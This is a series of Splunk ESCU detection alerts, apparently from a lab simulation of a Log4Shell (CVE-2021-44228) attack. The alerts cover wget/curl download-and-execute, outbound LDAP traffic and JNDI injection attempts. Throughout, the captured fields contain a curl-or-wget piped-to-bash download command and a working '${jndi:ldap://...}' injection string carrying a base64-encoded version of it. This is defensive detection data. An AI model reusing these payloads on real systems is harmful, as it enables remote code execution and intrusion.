CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642153, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642153, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642151, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="DE.CM", annotations._all="CIS 3", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with 